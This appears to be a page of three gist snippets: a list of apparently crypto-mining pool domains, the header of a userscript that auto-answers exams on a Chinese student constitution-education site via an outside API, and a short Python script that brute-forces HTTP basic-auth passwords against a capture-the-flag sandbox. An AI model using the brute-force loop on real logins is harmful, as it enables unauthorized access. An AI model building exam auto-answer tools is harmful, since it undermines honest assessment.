This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
011data.com | |
0769.it | |
0xpool.me | |
1pool.org | |
1square.net | |
2acoin.org | |
2ch-pool.com | |
2mars.biz | |
2miners.com | |
4assets.digital |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==UserScript== | |
// @name 普法网(宪法小卫士)课后练习、考试自动答题 | |
// @namespace Ne-21 | |
// @version 1.3 | |
// @description 第六届全国学生“学宪法 讲宪法”活动 | |
// @author Ne-21 | |
// @match https://static.qspfw.moe.gov.cn/xf2021/learn-practice.html* | |
// @match https://static.qspfw.moe.gov.cn/xf2021/learn_exam.html* | |
// @icon https://blog.gocos.cn/wp-content/uploads/2021/07/2021-07-2782.ico | |
// @connect api.gocos.cn |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
url = "http://challenge-fe7563142b0b0b02.sandbox.ctfhub.com:10800/flag.html" | |
for line in open("10_million_password_list_top_100.txt"): | |
response = requests.request("GET", url, auth=( | |
'admin', line.replace('\n', '').replace('\r', ''))) | |
if response.status_code != 401: | |
print(response.text) |